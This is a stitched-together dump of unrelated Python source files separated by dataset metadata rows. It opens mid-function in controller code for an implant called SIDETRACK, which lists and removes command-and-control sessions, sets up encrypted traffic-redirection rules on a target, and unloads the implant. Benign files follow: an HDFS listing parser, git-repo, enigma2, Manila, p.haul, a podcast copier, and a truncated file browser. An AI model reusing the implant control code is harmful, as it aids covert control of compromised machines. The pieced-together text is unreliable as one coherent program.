if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
removed = 0
if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
rule = 0
i = 0
while i < len(self.implant.rules):
if self.implant.rules[i].remoteRuleNum == rule or rule == 0:
res = self.implant.rules[i].remove()
if res[0] == 0:
return res
removed = 1
i = i - 1
i = i + 1
if removed == 0 or rule == 0:
self.data = struct.pack("!L",rule)
self.Query()
if self.op == 0x26L and self.res == 0x1L:
return (1, "Rule(s) removed successfully")
else:
return (0, "Error removing rule(s)")
else:
return res
#############################################################################
# CCLIST class
# opcode 0x29
#############################################################################
class SIDECMD_CCLIST(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "cclist"
self.usage = "cclist"
self.info = "List all of the command and control sessions"
self.op = 0x29L
def parseReturn(self):
self.more,self.rule,self.longevity,self.srcip,self.dstip,\
self.srcport,self.dstport = struct.unpack("!LLLLLHH",self.data[0:24])
if self.more & 2L:
self.current = "(CURRENT) "
else:
self.current = ""
self.longevity = time.ctime(self.longevity-self.implant.timediff)[4:]
self.srcip = self.ConvertToDot(self.srcip)
self.dstip = self.ConvertToDot(self.dstip)
def displayCurrent(self):
# STUB: Make this better!
if self.rule == 0xffffffffL:
return ""
res = "%d %s%s:%d<->%s:%d Expires: %s\n" % \
(self.rule,self.current,self.srcip,self.srcport,\
self.dstip,self.dstport,self.longevity)
return res
def run(self):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
res = ""
last = 0L
self.more = 1
while self.more & 1L:
self.data = struct.pack("!L",last)
self.Query()
if self.op == 0x29L and self.res == 0x1L:
self.parseReturn()
res = self.displayCurrent() + res
last = self.rule
else:
return (0, "Error getting CC rules")
return (1,res)
#############################################################################
# CCREMOVE class
# opcode 0x2a
#############################################################################
class SIDECMD_CCREMOVE(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "ccremove"
self.usage = "ccremove <rule>"
self.info = "Remove a command and control session (see also: done)"
self.op = 0x2aL
def run(self,rule):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
self.data = struct.pack("!L",rule)
self.Query()
if self.op == 0x2aL and self.res == 0x1L:
return (1, "Session removed successfully")
else:
return (0, "Unable to remove CC session (note: you cannot remove yourself, see: done)")
#############################################################################
# UNLOAD class
# opcode 0x30
#############################################################################
class SIDECMD_UNLOAD(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "stunload"
self.usage = "stunload <magic>"
self.info = "Remove SIDETRACK from the target"
self.op = 0x30L
def run(self, magic):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
self.data = struct.pack("!L",magic);
self.Query()
if self.op == 0x30L and self.res == 0x1L:
return (1, "SIDETRACK successfully removed from target")
else:
return (0, "Cannot remove SIDETRACK");
base.RegisterImplant('SIDETRACK', SIDETRACK)
class REDIRECT(SIDECMD):
def __init__(self, cmd, next, longevity, connection_timeout, protocol,\
A_ip, T_ip, ident, seq, munge, crypto_key, ttl_mod, flags, \
A_port, SA_port, T_port, ST_port):
SIDECMD.__init__(self)
self.protocol = cmd.protocol
self.implant = cmd.implant
self.session = cmd.implant.session
self.target = cmd.implant.session.target
self.longevity = longevity
self.nextRule = next
self.connection_timeout = connection_timeout
self.proto = protocol
self.A_ip = A_ip
self.T_ip = T_ip
self.ident = ident
self.seq = seq
self.munge = munge
self.crypto_key = crypto_key
self.ttl_mod = ttl_mod
self.flags = flags
self.A_port = A_port
self.SA_port = SA_port
self.T_port = T_port
self.ST_port = ST_port
self.added = 0
self.localRuleNum = None
self.remoteRuleNum = None
self.prev = None
self.next = None
self.ccPassthru = None
def remove(self,direction=0):
if self.added == 0:
return (0, "Rule does not exist")
if self.ccPassthru != None:
cmd = self.ccPassthru.GetCommand('done')
cmd.run()
if direction != 1 and self.next != None:
res = self.next.remove(2)
if res[0] == 0:
return (res[0], "Rule could not be removed: " + res[1])
self.next = None
if self.remoteRuleNum != None:
self.op = 0x26L
self.data = struct.pack("!L",self.remoteRuleNum)
self.Query()
if self.op == 0x26L and self.res == 0x1L:
base.redir.delete(self.localRuleNum)
self.added = 0
self.localRuleNum = None
self.implant.rules.remove(self)
if direction != 2 and self.prev != None:
res = self.prev.remove(1)
if res[0] == 0:
return (0,"Rule %d removed: %s"%(self.remoteRuleNum,res[1]))
return (1, "Rule %d removed"%(self.remoteRuleNum))
else:
return (0, "Rule could not be removed")
else:
base.redir.delete(self.localRuleNum)
return (1, "Local rule removed")
def set(self,value,direction=0):
if self.added == 0:
return (0, "Rule does not exist")
if direction != 1 and self.next != None:
res = self.next.set(value,2)
if res[0] == 0:
return(res[0], "Rule could not be set: " + res[1])
if self.remoteRuleNum:
self.op = 0x25L
self.data = struct.pack("!LH",self.remoteRuleNum, value)
self.Query()
if self.op == 0x25L and self.res == 0x1L:
base.redir.set(self.localRuleNum, value)
if direction != 2 and self.prev != None:
res = self.prev.set(value,1)
if res[0] == 0:
return (0,"Rule %d set: %s"%(self.remoteRuleNum,res[1]))
return (1, "Rule %d set"%(self.remoteRuleNum))
else:
return (0, "Rule could not be set")
else:
base.redir.set(self.localRuleNum, value)
return (1, "Local rule set")
def add(self, addremote=1):
if self.added == 1:
return (0, "Rule already exists", 0)
AT_ip = 0
if addremote:
self.op = 0x23L
self.data = struct.pack("!LLL",self.nextRule, self.longevity,\
self.connection_timeout)
self.data = self.data + self.A_ip + self.T_ip
self.data = self.data + struct.pack("!HHLLLLLHHHHHHL",self.flags,\
(self.ttl_mod << 8 | self.proto), self.munge,\
self.crypto_key[0],self.crypto_key[1],self.crypto_key[2],\
self.crypto_key[3], self.ident, 0, self.A_port, \
self.SA_port, self.T_port, self.ST_port, self.seq)
self.Query()
if self.op == 0x23L and self.res == 0x01L:
self.remoteRuleNum = struct.unpack("!L", self.data[0:4])[0]
AT_ip = struct.unpack("!L", self.data[4:8])[0]
self.ST_ip = self.data[4:8]
res = base.redir.redir(self.longevity,self.connection_timeout,\
self.ConvertIP(self.target.ip), \
self.T_ip,\
self.seq, self.munge, self.crypto_key, \
self.flags, self.A_port, self.SA_port,\
self.ident, self.proto)
if res < 1:
self.op = 0x26L
self.data = struct.pack("!L",self.remoteRuleNum)
self.Query()
if self.op == 0x26L and self.res == 0x1L:
self.remoteRuleNum = None
return (0, "Local rule could not be added", AT_ip)
else:
return (0, "Local rule could not be added, remote rule may still exist", AT_ip)
self.localRuleNum = res
self.added = 1
self.implant.rules.append(self)
return (self.remoteRuleNum, "Rule %d added" %(self.remoteRuleNum), AT_ip)
else:
return (0, "Remote rule could not be added", AT_ip)
else:
self.remoteRuleNum = None
res = base.redir.redir(self.longevity,self.connection_timeout,\
self.ConvertIP(self.target.ip), \
self.T_ip,\
self.seq, self.munge, self.crypto_key, \
self.flags, self.A_port, self.SA_port,\
self.ident, self.proto)
if res < 1:
return (0, "Local rule could not be added", 0)
self.added = 1
self.localRuleNum = res
return (1, "Local rule added", 0)
|
unlicense
| 5,147,977,936,728,221,000
| 35.501265
| 289
| 0.462023
| false
| 3.780741
| false
| false
| false
|
simondolle/hls-autocomplete
|
hls_autocomplete/parse.py
|
1
|
5470
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import datetime
from time import strptime
import re
import os
import json
class FileStatus(object):
def __init__(self, path, rights, nbFiles, owner, group, size, date, relpath = None):
self.path = path
self.rights = rights
self.nbFiles = nbFiles
self.owner = owner
self.group = group
self.size = size
self.date = date
self.relpath = relpath
def __eq__(self, other):
return (self.path == other.path and self.rights == other.rights and
self.nbFiles == other.nbFiles and self.owner == other.owner and self.group == other.group and
self.size == other.size and self.date == other.date)
def is_dir(self):
return self.rights.startswith("d")
def __str__(self):
return self.to_str(0, 0, 0, 0, 0, 0, 0)
def to_str(self, rights_width, nbFiles_width, owner_width, group_width, size_width, date_width, path_with):
if self.is_dir:
nb_files = "-"
else:
nb_files = str(self.nbFiles)
result = "%s %s %s %s %s %s %s" % (self.rights.ljust(rights_width),
nb_files.ljust(nbFiles_width),
self.owner.ljust(owner_width),
self.group.ljust(group_width),
str(self.size).ljust(size_width),
self.date.strftime("%Y-%M-%d %H:%M").ljust(date_width),
self.path.ljust(path_with))
return result.encode("utf-8")
def get_file_statuses_pretty_print(file_statuses):
rights_width = 0
nb_files_width = 0
owner_width = 0
group_width = 0
size_width = 0
date_width = 0
path_width = 0
if len(file_statuses) != 0:
rights_width = max([len(fs.rights) for fs in file_statuses])
nb_files_width = max([len(str(fs.nbFiles)) for fs in file_statuses])
owner_width = max([len(fs.owner) for fs in file_statuses])
group_width = max([len(fs.group) for fs in file_statuses])
size_width = max([len(str(fs.size)) for fs in file_statuses])
date_width = max([len(fs.date.strftime("%Y-%M-%d %H:%M")) for fs in file_statuses])
path_width = max([len(fs.path) for fs in file_statuses])
result = []
for file_status in file_statuses:
result.append(file_status.to_str(rights_width, nb_files_width, owner_width, group_width, size_width, date_width, path_width))
return "\n".join(result)
class LsParser(object):
def __init__(self):
pass
def parse_line(self, line):
regex = "^([rwxd@+-]+)\s+(\d+)\s+(\w+)\s+(\w+)\s+(\d+)\s+(\d+)\s+(\w+)\s+([:\d]+)\s+(/.+)$"
m = re.match(regex, line, re.UNICODE)
if m is None:
return None
rights = m.group(1)
nbFiles = int(m.group(2))
owner = m.group(3)
group = m.group(4)
size = int(m.group(5))
day = int(m.group(6))
month = m.group(7)
try:
month = strptime(month, '%b').tm_mon
except:
month = [u"jan", u"fév", u"mar", u"avr", u"mai", u"jui", u"juil", u"aoû", u"sep", u"oct", u"nov", u"déc"].index(month) + 1
try:
year = int(m.group(8))
except:
year = datetime.datetime.now().year
filename = m.group(9)
date = datetime.date(year, month, day)
return FileStatus(filename, rights, nbFiles, owner, group, size, date)
def parse(self, output):
result = [self.parse_line(line) for line in output.split("\n")]
return [p for p in result if p is not None]
class WebHdfsParser(object):
def __init__(self, path):
self.path = path
def permissions_to_unix_name(self, is_dir, rights):
is_dir_prefix = 'd' if is_dir else '-'
sticky = False
if len(rights) == 4 and rights[0] == '1':
sticky = True
rights = rights[1:]
dic = {'7': 'rwx', '6': 'rw-', '5': 'r-x', '4': 'r--', '3': '-wx', '2': '-w-', '1': '--x', '0': '---'}
result = is_dir_prefix + ''.join(dic[x] for x in rights)
if sticky:
result = result[:-1] + "t"
return result
def parse_status(self, status):
relpath = status["pathSuffix"]
path = os.path.join(self.path, relpath)
nbFiles = 0
size = status["length"]
owner = status["owner"]
group = status["group"]
is_dir = status["type"] == "DIRECTORY"
right_digits = status["permission"]
rights = self.permissions_to_unix_name(is_dir, right_digits)
parsed_date = datetime.datetime.utcfromtimestamp(int(status["modificationTime"])/1000)
date = datetime.datetime(parsed_date.year, parsed_date.month, parsed_date.day, parsed_date.hour, parsed_date.minute)
return FileStatus(path, rights, nbFiles, owner, group, size, date, relpath)
def parse(self, output):
try:
j = json.loads(output)
except:
print output
return []
if "FileStatuses" not in j or "FileStatus" not in j["FileStatuses"]:
print j
return []
statuses = j["FileStatuses"]["FileStatus"]
result = []
for status in statuses:
result.append(self.parse_status(status))
return result
|
mit
| 8,956,800,245,281,798,000
| 33.821656
| 134
| 0.539601
| false
| 3.488832
| false
| false
| false
|
lipro-yocto/git-repo
|
subcmds/prune.py
|
1
|
1907
|
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from color import Coloring
from command import PagedCommand
class Prune(PagedCommand):
common = True
helpSummary = "Prune (delete) already merged topics"
helpUsage = """
%prog [<project>...]
"""
def Execute(self, opt, args):
all_branches = []
for project in self.GetProjects(args):
all_branches.extend(project.PruneHeads())
if not all_branches:
return
class Report(Coloring):
def __init__(self, config):
Coloring.__init__(self, config, 'status')
self.project = self.printer('header', attr='bold')
out = Report(all_branches[0].project.config)
out.project('Pending Branches')
out.nl()
project = None
for branch in all_branches:
if project != branch.project:
project = branch.project
out.nl()
out.project('project %s/' % project.relpath)
out.nl()
print('%s %-33s ' % (
branch.name == project.CurrentBranch and '*' or ' ',
branch.name), end='')
if not branch.base_exists:
print('(ignoring: tracking branch is gone: %s)' % (branch.base,))
else:
commits = branch.commits
date = branch.date
print('(%2d commit%s, %s)' % (
len(commits),
len(commits) != 1 and 's' or ' ',
date))
|
apache-2.0
| -1,370,391,103,459,699,500
| 28.796875
| 74
| 0.633456
| false
| 3.940083
| false
| false
| false
|
atvcaptain/enigma2
|
lib/python/Plugins/Extensions/DVDBurn/Title.py
|
1
|
6455
|
from __future__ import absolute_import
from Components.config import ConfigSubsection, ConfigSubList, ConfigInteger, ConfigText, ConfigSelection
from . import TitleCutter
class ConfigFixedText(ConfigText):
def __init__(self, text, visible_width=60):
ConfigText.__init__(self, default = text, fixed_size = True, visible_width = visible_width)
def handleKey(self, key):
pass
class Title:
def __init__(self, project):
self.properties = ConfigSubsection()
self.properties.menutitle = ConfigText(fixed_size = False, visible_width = 80)
self.properties.menusubtitle = ConfigText(fixed_size = False, visible_width = 80)
self.properties.aspect = ConfigSelection(choices = [("4:3", _("4:3")), ("16:9", _("16:9"))])
self.properties.widescreen = ConfigSelection(choices = [("nopanscan", "nopanscan"), ("noletterbox", "noletterbox")])
self.properties.autochapter = ConfigInteger(default = 0, limits = (0, 60))
self.properties.audiotracks = ConfigSubList()
self.DVBname = _("Title")
self.DVBdescr = _("Description")
self.DVBchannel = _("Channel")
self.cuesheet = [ ]
self.source = None
self.filesize = 0
self.estimatedDiskspace = 0
self.inputfile = ""
self.cutlist = [ ]
self.chaptermarks = [ ]
self.timeCreate = None
self.project = project
self.length = 0
self.VideoType = -1
self.VideoPID = -1
self.framerate = 0
self.progressive = -1
self.resolution = (-1, -1)
def addService(self, service):
from os import path
from enigma import eServiceCenter, iServiceInformation
from ServiceReference import ServiceReference
from time import localtime, time
self.source = service
serviceHandler = eServiceCenter.getInstance()
info = serviceHandler.info(service)
sDescr = info and info.getInfoString(service, iServiceInformation.sDescription) or ""
self.DVBdescr = sDescr
sTimeCreate = info.getInfo(service, iServiceInformation.sTimeCreate)
if sTimeCreate > 1:
self.timeCreate = localtime(sTimeCreate)
serviceref = ServiceReference(info.getInfoString(service, iServiceInformation.sServiceref))
name = info and info.getName(service) or "Title" + sDescr
self.DVBname = name
self.DVBchannel = serviceref.getServiceName()
self.inputfile = service.getPath()
self.filesize = path.getsize(self.inputfile)
self.estimatedDiskspace = self.filesize
self.length = info.getLength(service)
def addFile(self, filename):
from enigma import eServiceReference
ref = eServiceReference(1, 0, filename)
self.addService(ref)
self.project.session.openWithCallback(self.titleEditDone, TitleCutter.CutlistReader, self)
def titleEditDone(self, cutlist):
self.initDVDmenuText(len(self.project.titles))
self.cuesheet = cutlist
self.produceFinalCuesheet()
def initDVDmenuText(self, track):
s = self.project.menutemplate.settings
self.properties.menutitle.setValue(self.formatDVDmenuText(s.titleformat.getValue(), track))
self.properties.menusubtitle.setValue(self.formatDVDmenuText(s.subtitleformat.getValue(), track))
def formatDVDmenuText(self, template, track):
template = template.replace("$i", str(track))
template = template.replace("$t", self.DVBname)
template = template.replace("$d", self.DVBdescr)
template = template.replace("$c", str(len(self.chaptermarks)+1))
template = template.replace("$f", self.inputfile)
template = template.replace("$C", self.DVBchannel)
#if template.find("$A") >= 0:
audiolist = [ ]
for audiotrack in self.properties.audiotracks:
active = audiotrack.active.getValue()
if active:
trackstring = audiotrack.format.getValue()
trackstring += ' (' + audiotrack.language.getValue() + ')'
audiolist.append(trackstring)
audiostring = ', '.join(audiolist)
template = template.replace("$A", audiostring)
if template.find("$l") >= 0:
l = self.length
lengthstring = "%d:%02d:%02d" % (l/3600, l%3600/60, l%60)
template = template.replace("$l", lengthstring)
if self.timeCreate:
template = template.replace("$Y", str(self.timeCreate[0]))
template = template.replace("$M", str(self.timeCreate[1]))
template = template.replace("$D", str(self.timeCreate[2]))
timestring = "%d:%02d" % (self.timeCreate[3], self.timeCreate[4])
template = template.replace("$T", timestring)
else:
template = template.replace("$Y", "").replace("$M", "").replace("$D", "").replace("$T", "")
return template
def produceFinalCuesheet(self):
CUT_TYPE_IN = 0
CUT_TYPE_OUT = 1
CUT_TYPE_MARK = 2
CUT_TYPE_LAST = 3
accumulated_in = 0
accumulated_at = 0
last_in = 0
self.cutlist = [ ]
self.chaptermarks = [ ]
# our demuxer expects *strictly* IN,OUT lists.
currently_in = not any(type == CUT_TYPE_IN for pts, type in self.cuesheet)
if currently_in:
self.cutlist.append(0) # emulate "in" at first
for (pts, type) in self.cuesheet:
#print "pts=", pts, "type=", type, "accumulated_in=", accumulated_in, "accumulated_at=", accumulated_at, "last_in=", last_in
if type == CUT_TYPE_IN and not currently_in:
self.cutlist.append(pts)
last_in = pts
currently_in = True
if type == CUT_TYPE_OUT and currently_in:
self.cutlist.append(pts)
# accumulate the segment
accumulated_in += pts - last_in
accumulated_at = pts
currently_in = False
if type == CUT_TYPE_MARK and currently_in:
# relocate chaptermark against "in" time. This is not 100% accurate,
# as the in/out points are not.
reloc_pts = pts - last_in + accumulated_in
self.chaptermarks.append(reloc_pts)
if len(self.cutlist) > 1:
part = accumulated_in / (self.length*90000.0)
usedsize = int ( part * self.filesize )
self.estimatedDiskspace = usedsize
self.length = accumulated_in / 90000
def getChapterMarks(self, template="$h:$m:$s.$t"):
timestamps = [ ]
chapters = [ ]
minutes = self.properties.autochapter.getValue()
if len(self.chaptermarks) < 1 and minutes > 0:
chapterpts = 0
while chapterpts < (self.length-60*minutes)*90000:
chapterpts += 90000 * 60 * minutes
chapters.append(chapterpts)
else:
chapters = self.chaptermarks
for p in chapters:
timestring = template.replace("$h", str(p / (90000 * 3600)))
timestring = timestring.replace("$m", ("%02d" % (p % (90000 * 3600) / (90000 * 60))))
timestring = timestring.replace("$s", ("%02d" % (p % (90000 * 60) / 90000)))
timestring = timestring.replace("$t", ("%03d" % ((p % 90000) / 90)))
timestamps.append(timestring)
return timestamps
|
gpl-2.0
| 1,176,808,851,013,645,800
| 36.52907
| 127
| 0.696514
| false
| 3.119865
| true
| false
| false
|
vponomaryov/manila
|
manila/share/drivers/dell_emc/plugins/vmax/constants.py
|
1
|
1753
|
# Copyright (c) 2016 Dell Inc. or its subsidiaries.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
STATUS_OK = 'ok'
STATUS_INFO = 'info'
STATUS_DEBUG = 'debug'
STATUS_WARNING = 'warning'
STATUS_ERROR = 'error'
STATUS_NOT_FOUND = 'not_found'
MSG_GENERAL_ERROR = '13690601492'
MSG_INVALID_VDM_ID = '14227341325'
MSG_INVALID_MOVER_ID = '14227341323'
MSG_FILESYSTEM_NOT_FOUND = "18522112101"
MSG_FILESYSTEM_EXIST = '13691191325'
MSG_VDM_EXIST = '13421840550'
MSG_SNAP_EXIST = '13690535947'
MSG_INTERFACE_NAME_EXIST = '13421840550'
MSG_INTERFACE_EXIST = '13691781136'
MSG_INTERFACE_INVALID_VLAN_ID = '13421850371'
MSG_INTERFACE_NON_EXISTENT = '13691781134'
MSG_JOIN_DOMAIN = '13157007726'
MSG_UNJOIN_DOMAIN = '13157007723'
# Necessary to retry when VMAX database is locked for provisioning operation
MSG_CODE_RETRY = '13421840537'
IP_ALLOCATIONS = 2
CONTENT_TYPE_URLENCODE = {'Content-Type': 'application/x-www-form-urlencoded'}
XML_HEADER = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
XML_NAMESPACE = 'http://www.emc.com/schemas/celerra/xml_api'
CIFS_ACL_FULLCONTROL = 'fullcontrol'
CIFS_ACL_READ = 'read'
SSH_DEFAULT_RETRY_PATTERN = r'Error 2201:.*: unable to acquire lock\(s\)'
|
apache-2.0
| 1,427,866,968,296,748,000
| 30.872727
| 78
| 0.731888
| false
| 2.976231
| false
| false
| false
|
avagin/p.haul
|
p_haul_ovz.py
|
1
|
4646
|
#
# OpenVZ containers hauler module
#
import os
import shutil
import p_haul_cgroup
import p_haul_netifapi as netif
import p_haul_fsapi as fsapi
import p_haul_netapi as netapi
import fs_haul_shared
import fs_haul_subtree
name = "ovz"
vzpid_dir = "/var/lib/vzctl/vepid/"
vz_dir = "/vz"
vzpriv_dir = "%s/private" % vz_dir
vzroot_dir = "%s/root" % vz_dir
vz_conf_dir = "/etc/vz/conf/"
vz_pidfiles = "/var/lib/vzctl/vepid/"
cg_image_name = "ovzcg.img"
class p_haul_type:
def __init__(self, id):
self._ctid = id
#
# This list would contain (v_in, v_out, v_br) tuples where
# v_in is the name of veth device in CT
# v_out is its peer on the host
# v_bridge is the bridge to which thie veth is attached
#
self._veths = []
self._cfg = []
def __load_ct_config(self, dir):
print "Loading config file from %s" % dir
ifd = open(os.path.join(dir, self.__ct_config()))
for line in ifd:
self._cfg.append(line)
if line.startswith("NETIF="):
#
# Parse and keep veth pairs, later we will
# equip restore request with this data and
# will use it while (un)locking the network
#
v_in = None
v_out = None
v_bridge = None
vs = line.strip().split("=", 1)[1].strip("\"")
for parm in vs.split(","):
pa = parm.split("=")
if pa[0] == "ifname":
v_in = pa[1]
elif pa[0] == "host_ifname":
v_out = pa[1]
elif pa[0] == "bridge":
v_bridge = pa[1]
if v_in and v_out:
print "\tCollect %s -> %s (%s) veth" % (v_in, v_out, v_bridge)
veth = netapi.net_dev()
veth.name = v_in
veth.pair = v_out
veth.link = v_bridge
self._veths.append(veth)
ifd.close()
def __apply_cg_config(self):
print "Applying CT configs"
# FIXME -- implement
pass
def id(self):
return (name, self._ctid)
def init_src(self):
self._fs_mounted = True
self._bridged = True
self.__load_ct_config(vz_conf_dir)
def init_dst(self):
self._fs_mounted = False
self._bridged = False
def root_task_pid(self):
pf = open(os.path.join(vzpid_dir, self._ctid))
pid = pf.read()
return int(pid)
def __ct_priv(self):
return "%s/%s" % (vzpriv_dir, self._ctid)
def __ct_root(self):
return "%s/%s" % (vzroot_dir, self._ctid)
def __ct_config(self):
return "%s.conf" % self._ctid
#
# Meta-images for OVZ -- container config and info about CGroups
#
def get_meta_images(self, dir):
cg_img = os.path.join(dir, cg_image_name)
p_haul_cgroup.dump_hier(self.root_task_pid(), cg_img)
cfg_name = self.__ct_config()
return [ (os.path.join(vz_conf_dir, cfg_name), cfg_name), \
(cg_img, cg_image_name) ]
def put_meta_images(self, dir):
print "Putting config file into %s" % vz_conf_dir
self.__load_ct_config(dir)
ofd = open(os.path.join(vz_conf_dir, self.__ct_config()), "w")
ofd.writelines(self._cfg)
ofd.close()
# Keep this name, we'll need one in prepare_ct()
self.cg_img = os.path.join(dir, cg_image_name)
#
# Create cgroup hierarchy and put root task into it
# Hierarchy is unlimited, we will apply config limitations
# in ->restored->__apply_cg_config later
#
def prepare_ct(self, pid):
p_haul_cgroup.restore_hier(pid, self.cg_img)
def __umount_root(self):
print "Umounting CT root"
os.system("umount %s" % self.__ct_root())
self._fs_mounted = False
def mount(self):
nroot = self.__ct_root()
print "Mounting CT root to %s" % nroot
if not os.access(nroot, os.F_OK):
os.makedirs(nroot)
os.system("mount --bind %s %s" % (self.__ct_priv(), nroot))
self._fs_mounted = True
return nroot
def umount(self):
if self._fs_mounted:
self.__umount_root()
def get_fs(self):
rootfs = fsapi.path_to_fs(self.__ct_priv())
if not rootfs:
print "CT is on unknown FS"
return None
print "CT is on %s" % rootfs
if rootfs == "nfs":
return fs_haul_shared.p_haul_fs()
if rootfs == "ext3" or rootfs == "ext4":
return fs_haul_subtree.p_haul_fs(self.__ct_priv())
print "Unknown CT FS"
return None
def restored(self, pid):
print "Writing pidfile"
pidfile = open(os.path.join(vz_pidfiles, self._ctid), 'w')
pidfile.write("%d" % pid)
pidfile.close()
self.__apply_cg_config()
def net_lock(self):
for veth in self._veths:
netif.ifdown(veth[1])
def net_unlock(self):
for veth in self._veths:
netif.ifup(veth[1])
if veth[2] and not self._bridged:
netif.bridge_add(veth[1], veth[2])
def can_migrate_tcp(self):
return True
def veths(self):
#
# Caller wants to see list of tuples with [0] being name
# in CT and [1] being name on host. Just return existing
# tuples, the [2] with bridge name wouldn't hurt
#
return self._veths
|
lgpl-2.1
| 7,124,431,274,139,254,000
| 23.197917
| 67
| 0.63022
| false
| 2.556962
| true
| false
| false
|
jima80525/pyres
|
pyres/filemanager.py
|
1
|
4287
|
"""
manages the files on the mp3 player
"""
import os
import re
import logging
import shutil
import pyres.utils as utils
def _double_digit_name(name):
""" Makes all numbers two digit numbers by adding a leading 0 where
necessary. Three digit or longer numbers are unaffected. """
# do a little clean up to start with
name = name.rstrip().replace('\\', '/')
name = name.rstrip('/') # make sure we don't have trailing / chars
# now pull of the trailing '3' on .mp3 filenames so we don't convert that
mp3suffix = ''
if name.endswith('mp3'):
name = name[:-1]
mp3suffix = '3'
# the regex produces a empty string at the end, skip that or zfill will
# expand it to 00. Note we cannot just remove the last element from the
# split as it does not always produce an empty element. Joy
elements = re.split(r'(\d+)', name)
if elements[-1] == '':
elements.pop()
result = ""
# this next section is a bit goofy. We need to tell whether a given
# element is a number (\d+) or not. Only if it's a number do we want to do
# the zfill on it. Else a name like '1b1a1z.1mp3' ends up adding a zero to
# the b a and z elements as well as the 1s. (in other words that string
# ends up with '010b010a010z.01mp3' instead of '01b01a01z.01mp3')
# It might be possible to be clever about the regex grouping on the split,
# but that idea is escaping me presently.
for element in elements:
try:
int(element)
except ValueError:
result += element
else:
result += element.zfill(2)
result += mp3suffix
return re.sub(' +', ' ', result) # remove double spaces
class FileManager(object):
""" Class to manage filesystem on mp3 player """
def __init__(self, base_dir):
# set default value for mp3 player
# base_dir = base_dir or "TestFiles"
base_dir = base_dir or "/media/jima/3C33-7AC4/"
self.base_dir = base_dir
utils.mkdir_p(self.base_dir)
def does_filesystem_exist(self):
""" Tests for existence - this is unused in real code, but it's handy
for unit tests. It was originally added to keep lint happy. """
return os.path.exists(self.base_dir)
def copy_audiobook(self, source_dir, dest_dir=None):
""" Main routine to convert and copy files to mp3 player """
if not dest_dir:
dest_dir = source_dir
print("Copying audiobook from %s" % source_dir)
else:
print("Coping audiobook from %s to %s" % (source_dir, dest_dir))
for root, dirs, files in os.walk(source_dir):
dirs.sort()
for dir_name in dirs:
full_dir = os.path.join(root, _double_digit_name(dir_name))
utils.mkdir_p(os.path.join(self.base_dir, full_dir))
for filename in sorted(files):
file_name = os.path.join(root, filename)
newfile = _double_digit_name(os.path.join(self.base_dir,
dest_dir, file_name))
logging.debug("copying %s to %s", file_name, newfile)
print("copying to %s" % (newfile))
shutil.copyfile(file_name, newfile)
def copy_episodes_to_player(self, episodes):
""" Copies the episodes to the mp3 player """
# make sure the podcast directory exists
podcast_dir = os.path.join(self.base_dir, "podcasts_" +
utils.current_date_time_as_string())
utils.mkdir_p(podcast_dir)
total = len(episodes)
counter = 0
for episode in sorted(episodes, key=lambda x: x.date):
episode.file_name = episode.file_name.replace('\\', '/')
(_, tail) = os.path.split(episode.file_name)
newfile = os.path.join(podcast_dir, tail)
logging.debug("copying %s to %s", episode.file_name, newfile)
shutil.copyfile(episode.file_name, newfile)
counter += 1
logging.debug("copied %s to %s", episode.file_name, newfile)
print("%2d/%d: copied %s to %s" % (counter, total,
episode.file_name, newfile))
|
mit
| -3,073,739,497,052,079,000
| 40.621359
| 79
| 0.586191
| false
| 3.767135
| false
| false
| false
|
bmars/sisko
|
sisko/app.py
|
1
|
4908
|
# Copyright (C) 2014 Brian Marshall
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from operator import attrgetter
from gi.repository import Gio
import urwid
from sisko.widgets import Dialog, OverlayStack, PathBar, FileItem
# Vim-like cursor movement.
urwid.command_map['k'] = 'cursor up'
urwid.command_map['j'] = 'cursor down'
urwid.command_map['h'] = 'cursor left'
urwid.command_map['l'] = 'cursor right'
class Application:
"""
Main application class.
"""
_PALETTE = [('dialog', 'black', 'light gray'),
('focused', 'white', 'dark blue'),
('folder', 'bold', ''),
('folder focused', 'white, bold', 'dark blue'),
('footer', 'light gray', 'dark gray'),
('footer key', 'white, bold', 'black'),
('path-bar', 'white', 'black'),
('path-bar current', 'white, bold', 'dark gray')]
_FOOTER = [('footer key', " Alt+H "), " ", _("Hidden Files"), " ",
('footer key', " Q "), " ", _("Quit")]
def __init__(self):
self._path_bar = PathBar()
self._files = urwid.SimpleFocusListWalker([])
self._toplevel = OverlayStack(urwid.Frame(
urwid.ListBox(self._files),
header=self._path_bar,
footer=urwid.AttrMap(urwid.Text(self._FOOTER), 'footer')))
self._show_hidden = False
def run(self, folder: Gio.File):
"""
Run the application, opening the given folder.
"""
self._open(folder)
